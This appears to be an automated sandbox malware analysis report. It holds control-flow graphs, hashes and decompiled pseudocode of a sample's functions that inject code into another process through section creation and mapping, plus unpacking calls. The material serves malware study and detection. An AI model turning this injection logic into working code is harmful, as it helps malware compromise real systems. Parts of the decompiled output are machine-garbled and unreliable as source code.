5283 4014c4 5282->5283 5284 401547 NtDuplicateObject 5283->5284 5293 401663 5283->5293 5285 401564 NtCreateSection 5284->5285 5284->5293 5286 4015e4 NtCreateSection 5285->5286 5287 40158a NtMapViewOfSection 5285->5287 5289 401610 5286->5289 5286->5293 5287->5286 5288 4015ad NtMapViewOfSection 5287->5288 5288->5286 5290 4015cb 5288->5290 5291 40161a NtMapViewOfSection 5289->5291 5289->5293 5290->5286 5292 401641 NtMapViewOfSection 5291->5292 5291->5293 5292->5293 5306 40cb54 5309 40c9c8 5306->5309 5310 40c9dc 5309->5310 5315 40e782 5310->5315 5312 40e782 __forcdecpt_l RtlAllocateHeap 5314 40ca05 5312->5314 5313 40c9e8 __forcdecpt_l 5313->5312 5316 40e7a0 5315->5316 5317 40e790 5315->5317 5319 40e66d 5316->5319 5317->5313 5320 40e682 __isleadbyte_l 5319->5320 5321 40e68e 5320->5321 5323 40b86a 5320->5323 5321->5317 5324 40b87d 5323->5324 5327 40b4c5 5324->5327 5326 40b89d 5326->5321 5328 40b4e6 5327->5328 5329 40b6ff ___ansicp 5328->5329 5331 40b55b 5328->5331 5330 40e454 ___convertcp RtlAllocateHeap 5329->5330 5339 40b635 __crtLCMapStringA_stat __freea 5329->5339 5333 40b752 5330->5333 5332 409e62 _malloc RtlAllocateHeap 5331->5332 5335 40b5ba 5331->5335 5331->5339 5332->5335 5334 409e62 _malloc RtlAllocateHeap 5333->5334 5337 40b78f _memset 5333->5337 5333->5339 5334->5337 5336 409e62 _malloc RtlAllocateHeap 5335->5336 5335->5339 5336->5339 5338 40e454 ___convertcp RtlAllocateHeap 5337->5338 5337->5339 5338->5339 5339->5326 5160 47003c 5161 470049 5160->5161 5173 470e0f SetErrorMode SetErrorMode 5161->5173 5166 470265 5167 4702ce VirtualProtect 5166->5167 5169 47030b 5167->5169 5168 470439 VirtualFree 5172 4704be LoadLibraryA 5168->5172 5169->5168 5171 4708c7 5172->5171 5174 470223 5173->5174 5175 470d90 5174->5175 5176 470dad 5175->5176 5177 470dbb GetPEB 5176->5177 5178 470238 VirtualAlloc 5176->5178 5177->5178 5178->5166

                                                          Executed Functions

                                                          Function 004013D8 Relevance: 10.8, APIs: 7, Instructions: 311COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 85 4013d8-4013de 86 4013df-401409 85->86 91 401400-401405 86->91 92 40140c call 40119e 86->92 91->92 94 401411-40142b 92->94 95 401410 94->95 96 40142d-401435 94->96 95->94 97 401437-40143f 96->97 98 4013cc 96->98 102 401441-401447 97->102 103 40145d-40146c 97->103 99 4013b1-4013c5 98->99 100 4013ce-4013d5 98->100 104 401449 102->104 105 40142c 102->105 106 40146d-401472 103->106 107 40149a-4014a5 104->107 108 40144b-401450 104->108 105->86 105->96 109 401474 106->109 110 401457 106->110 111 401452 108->111 112 4014bb-4014cd 108->112 109->106 116 401476-401478 109->116 114 401459-40145b 110->114 115 40143c-40143f 110->115 111->110 120 4014d2-4014d7 112->120 121 4014cf-4014d1 112->121 114->103 115->102 115->103 118 40147a-401482 116->118 119 4014de-4014f1 call 40119e 116->119 123 401484 118->123 125 4014f3 119->125 126 4014f6-4014fb 119->126 120->119 121->120 123->123 125->126 128 401501-401512 126->128 129 401824-40182c 126->129 133 401822 128->133 134 401518-401541 128->134 129->126 132 401831-401842 129->132 136 401845-401866 call 40119e 132->136 137 401838-40183e 132->137 133->132 134->133 143 401547-40155e NtDuplicateObject 134->143 137->136 143->133 145 401564-401588 NtCreateSection 143->145 147 4015e4-40160a NtCreateSection 145->147 148 40158a-4015ab NtMapViewOfSection 145->148 147->133 151 401610-401614 147->151 148->147 150 4015ad-4015c9 NtMapViewOfSection 148->150 150->147 152 4015cb-4015e1 150->152 151->133 153 40161a-40163b NtMapViewOfSection 151->153 152->147 153->133 154 401641-40165d NtMapViewOfSection 153->154 154->133 156 401663 call 401668 154->156
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b6a512c9d6eb5ca3050d385883f3a76be4b42a11236a0a405a38c14e89f911b
                                                          • Instruction ID: 67db8dc375151bfe257540867c3d287c712409260c0918a2d7cc4bffad82e0fd
                                                          • Opcode Fuzzy Hash: 9b6a512c9d6eb5ca3050d385883f3a76be4b42a11236a0a405a38c14e89f911b
                                                          • Instruction Fuzzy Hash: 22912472600204ABDB219FA1CC44EEF7BB8EF81B14F10467AFA12BB1F5D6759905CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014A8 Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 158 4014a8-4014c4 162 4014db 158->162 163 4014cc-4014f1 call 40119e 158->163 162->163 167 4014f3 163->167 168 4014f6-4014fb 163->168 167->168 170 401501-401512 168->170 171 401824-40182c 168->171 175 401822 170->175 176 401518-401541 170->176 171->168 174 401831-401842 171->174 178 401845-401866 call 40119e 174->178 179 401838-40183e 174->179 175->174 176->175 185 401547-40155e NtDuplicateObject 176->185 179->178 185->175 187 401564-401588 NtCreateSection 185->187 189 4015e4-40160a NtCreateSection 187->189 190 40158a-4015ab NtMapViewOfSection 187->190 189->175 193 401610-401614 189->193 190->189 192 4015ad-4015c9 NtMapViewOfSection 190->192 192->189 194 4015cb-4015e1 192->194 193->175 195 40161a-40163b NtMapViewOfSection 193->195 194->189 195->175 196 401641-40165d NtMapViewOfSection 195->196 196->175 198 401663 call 401668 196->198
                                                          C-Code - Quality: 59%
                                                          			E004014A8(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				long* _t130;
				signed int _t137;
				int _t138;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t160;
				intOrPtr* _t161;
				void* _t164;
				void* _t171;
				long _t172;
				intOrPtr _t173;
				void* _t174;
				long* _t180;
				intOrPtr* _t181;
				HANDLE* _t182;
				HANDLE* _t183;
				void* _t188;
				void* _t189;
				intOrPtr* _t192;
				void* _t193;
				intOrPtr _t196;
				intOrPtr* _t197;
				intOrPtr* _t198;
				void* _t200;
				intOrPtr* _t201;
				void* _t202;
				long _t217;

				_t84 = 0x14e3;
				_push(0x37f);
				_t128 =  *_t197;
				_t198 = _t197 + 4;
				L0040119E(_t84, _t128, _t171, __eflags);
				_t127 = _a4;
				_t172 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t180 =  &_v100;
				 *_t180 = _t172;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t130 =  &_v52;
					 *_t130 = _t90;
					_t130[1] = _t172;
					_t181 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t181, 0x18);
					 *_t181 = 0x18;
					_push( &_v52);
					_push(_t181);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t172, _t172, 2) == 0) {
						_v12 = _t172;
						_t98 =  &_v84;
						 *(_t98 + 4) = _t172;
						 *_t98 = 0x5000;
						_t182 =  &_v88;
						if(NtCreateSection(_t182, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t172;
							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t172;
								if(NtMapViewOfSection( *_t182, _v16, _t123, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
									_t196 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t172, _t196, 0x104);
									 *((intOrPtr*)(_t196 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t100 =  &_v84;
						 *(_t100 + 4) = _t172;
						 *_t100 = _a12 + 0x10000;
						_t183 =  &_v92;
						if(NtCreateSection(_t183, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t102 =  &_v76;
							 *_t102 = _t172;
							if(NtMapViewOfSection( *_t183, 0xffffffff, _t102, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
								_t104 =  &_v68;
								 *_t104 = _t172;
								_t217 = NtMapViewOfSection( *_t183, _v16, _t104, _t172, _t172, _t172,  &_v60, 1, _t172, 0x20);
								if(_t217 == 0) {
									L21();
									if(_t217 == 0 && _t217 != 0) {
									}
									_t200 = _t198 + 4;
									_push(0x2e62);
									_t201 = _t200 + 4;
									_push(0x2260);
									_t106 =  *_t201;
									_t202 = _t201 + 4;
									_t157 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t158 = _t157;
									asm("loop 0xffffffc2");
									_t159 = _t158 ^ 0xbcc951dd;
									_t198 = _t202 - _t159;
									_t188 = _a8 +  *_a8;
									_t137 =  *(_t188 + 6) & 0x0000ffff;
									_push(_t188);
									_t160 = _t188;
									if(_v56 == 0) {
										_t161 = _t160 + 0xf8;
										__eflags = _t161;
									} else {
										_t161 = _t160 + 0x108;
									}
									_push(_t137);
									_t138 =  *(_t161 + 0x10);
									if(_t138 != 0) {
										memcpy( *((intOrPtr*)(_t161 + 0xc)) + _v76,  *((intOrPtr*)(_t161 + 0x14)) + _a8, _t138);
										_t198 = _t198 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t222 = _v56;
									if(_v56 == 0) {
										_push(_t189);
										_t164 =  *((intOrPtr*)(_t189 + 0x34)) - _v68;
										_t192 =  *((intOrPtr*)(_t189 + 0xa0)) + _v76;
										__eflags = _t192;
										while(1) {
											__eflags =  *_t192;
											if( *_t192 == 0) {
												break;
											}
											_t173 =  *_t192;
											_t192 = _t192 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t173));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t193);
										_t172 = 0;
										__eflags = 0;
										_t108 =  &_v8;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t193 + 0x28)) + _v68, _v64, _t108, 0);
									} else {
										L54();
										_pop(_t174);
										_t172 = _t174 - 0x1760;
										 *((intOrPtr*)(_t172 + 0x1794)) = _t172 + 0x2c17;
										L00401227(_t127, _t172, _t222, _t172 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t172 + 0x17b9)) = _t172 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t129 =  *_t198;
				return L0040119E(_t91, _t129, _t172, _t222);
			}


































































                                                          0x004014bc
                                                          0x004014cc
                                                          0x004014d1
                                                          0x004014d4
                                                          0x004014de
                                                          0x004014e3
                                                          0x004014e6
                                                          0x004014e8
                                                          0x004014f1
                                                          0x004014f3
                                                          0x004014f3
                                                          0x004014f6
                                                          0x004014f6
                                                          0x004014fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00401829
                                                          0x00401829
                                                          0x00401501
                                                          0x00401504
                                                          0x00401507
                                                          0x0040150b
                                                          0x0040150e
                                                          0x00401512
                                                          0x00401518
                                                          0x0040151b
                                                          0x0040151d
                                                          0x00401520
                                                          0x00401526
                                                          0x00401529
                                                          0x00401537
                                                          0x00401538
                                                          0x00401539
                                                          0x0040153b
                                                          0x00401541
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156a
                                                          0x0040156d
                                                          0x00401573
                                                          0x00401588
                                                          0x0040158a
                                                          0x0040158d
                                                          0x00401590
                                                          0x00401593
                                                          0x004015ab
                                                          0x004015ad
                                                          0x004015b0
                                                          0x004015c9
                                                          0x004015cb
                                                          0x004015d5
                                                          0x004015db
                                                          0x004015e1
                                                          0x004015e1
                                                          0x004015c9
                                                          0x004015ab
                                                          0x004015e4
                                                          0x004015f0
                                                          0x004015f3
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                                                          • Instruction ID: cd3d7ef155730ff18c04e90283d35d9337f0c2e1175127a0e4488d23b7b2eda1
                                                          • Opcode Fuzzy Hash: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                                                          • Instruction Fuzzy Hash: B6511871900249BBEB219F91CC48FEBBBB9EF85B10F104129FA11BA2E5D7749941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014B3 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 200 4014b3-4014c4 202 4014db 200->202 203 4014cc-4014f1 call 40119e 200->203 202->203 207 4014f3 203->207 208 4014f6-4014fb 203->208 207->208 210 401501-401512 208->210 211 401824-40182c 208->211 215 401822 210->215 216 401518-401541 210->216 211->208 214 401831-401842 211->214 218 401845-401866 call 40119e 214->218 219 401838-40183e 214->219 215->214 216->215 225 401547-40155e NtDuplicateObject 216->225 219->218 225->215 227 401564-401588 NtCreateSection 225->227 229 4015e4-40160a NtCreateSection 227->229 230 40158a-4015ab NtMapViewOfSection 227->230 229->215 233 401610-401614 229->233 230->229 232 4015ad-4015c9 NtMapViewOfSection 230->232 232->229 234 4015cb-4015e1 232->234 233->215 235 40161a-40163b NtMapViewOfSection 233->235 234->229 235->215 236 401641-40165d NtMapViewOfSection 235->236 236->215 238 401663 call 401668 236->238
                                                          C-Code - Quality: 63%
                                                          			E004014B3(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				void* _t164;
				intOrPtr* _t165;
				void* _t168;
				long _t176;
				intOrPtr _t178;
				void* _t179;
				long* _t185;
				intOrPtr* _t187;
				HANDLE* _t188;
				HANDLE* _t189;
				void* _t194;
				void* _t195;
				intOrPtr* _t198;
				void* _t199;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				void* _t210;
				intOrPtr* _t211;
				void* _t212;
				long _t227;

				_t206 = _t205 + 1;
				_t84 = 0x14e3;
				_push(0x37f);
				_t130 =  *_t206;
				_t207 = _t206 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t203 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t87;
				_t185 = _t203 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t185);
				_t90 =  *_t185;
				if(_t90 != 0) {
					_t132 = _t203 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t176;
					_t187 = _t203 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t203 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t203 - 8) = _t176;
						_t98 = _t203 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 = 0x5000;
						_t188 = _t203 - 0x54;
						if(NtCreateSection(_t188, 6, _t176, _t98, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t121 = _t203 - 0x44;
							 *_t121 = _t176;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t121, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t123 = _t203 - 0x3c;
								 *_t123 = _t176;
								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t123, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t176, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t100 = _t203 - 0x50;
						 *(_t100 + 4) = _t176;
						 *_t100 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						if(NtCreateSection(_t189, 0xe, _t176, _t100, 0x40, 0x8000000, _t176) == 0 &&  *(_t203 - 8) != 0) {
							 *_t46 =  *(_t203 - 0x50);
							_t102 = _t203 - 0x48;
							 *_t102 = _t176;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t102, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t104 = _t203 - 0x40;
								 *_t104 = _t176;
								_t227 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t104, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 0x20);
								if(_t227 == 0) {
									L20();
									if(_t227 == 0 && _t227 != 0) {
									}
									_t210 = _t207 + 4;
									_push(0x2e62);
									_t211 = _t210 + 4;
									_push(0x2260);
									_t106 =  *_t211;
									_t212 = _t211 + 4;
									_t161 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t162 = _t161;
									asm("loop 0xffffffc2");
									_t163 = _t162 ^ 0xbcc951dd;
									_t207 = _t212 - _t163;
									_t194 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
									_t139 =  *(_t194 + 6) & 0x0000ffff;
									_push(_t194);
									_t164 = _t194;
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_t165 = _t164 + 0xf8;
										__eflags = _t165;
									} else {
										_t165 = _t164 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t165 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t165 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t165 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
										_t207 = _t207 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t195);
									_t232 =  *((intOrPtr*)(_t203 - 0x34));
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_push(_t195);
										_t168 =  *((intOrPtr*)(_t195 + 0x34)) -  *(_t203 - 0x40);
										_t198 =  *((intOrPtr*)(_t195 + 0xa0)) +  *(_t203 - 0x48);
										__eflags = _t198;
										while(1) {
											__eflags =  *_t198;
											if( *_t198 == 0) {
												break;
											}
											_t178 =  *_t198;
											_t198 = _t198 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t168;
												__eflags =  *((intOrPtr*)(0 +  *(_t203 - 0x48) + _t178));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t199);
										_t176 = 0;
										__eflags = 0;
										_t108 = _t203 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t199 + 0x28)) +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t108, 0);
									} else {
										L53();
										_pop(_t179);
										_t176 = _t179 - 0x1760;
										 *((intOrPtr*)(_t176 + 0x1794)) = _t176 + 0x2c17;
										L00401227(_t128, _t176, _t232, _t176 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t176 + 0x17b9)) = _t176 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t207;
				return L0040119E(_t91, _t131, _t176, _t232);
			}















































                                                          0x004014b4
                                                          0x004014bc
                                                          0x004014cc
                                                          0x004014d1
                                                          0x004014d4
                                                          0x004014de
                                                          0x004014e3
                                                          0x004014e6
                                                          0x004014e8
                                                          0x004014f1
                                                          0x004014f3
                                                          0x004014f3
                                                          0x004014f6
                                                          0x004014f6
                                                          0x004014fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00401829
                                                          0x00401829
                                                          0x00401501
                                                          0x00401504
                                                          0x00401507
                                                          0x0040150b
                                                          0x0040150e
                                                          0x00401512
                                                          0x00401518
                                                          0x0040151b
                                                          0x0040151d
                                                          0x00401520
                                                          0x00401526
                                                          0x00401529
                                                          0x00401537
                                                          0x00401538
                                                          0x00401539
                                                          0x0040153b
                                                          0x00401541
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156a
                                                          0x0040156d
                                                          0x00401573
                                                          0x00401588
                                                          0x0040158d
                                                          0x00401590
                                                          0x00401593
                                                          0x004015ab
                                                          0x004015ad
                                                          0x004015b0
                                                          0x004015c9
                                                          0x004015cb
                                                          0x004015d5
                                                          0x004015db
                                                          0x004015e1
                                                          0x004015e1
                                                          0x004015c9
                                                          0x004015ab
                                                          0x004015e4
                                                          0x004015f0
                                                          0x004015f3
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                                                          • Instruction ID: 39cbb5cf0de6fd42451f7104dd6b59036266353996c087b5e70b14ffae25b97f
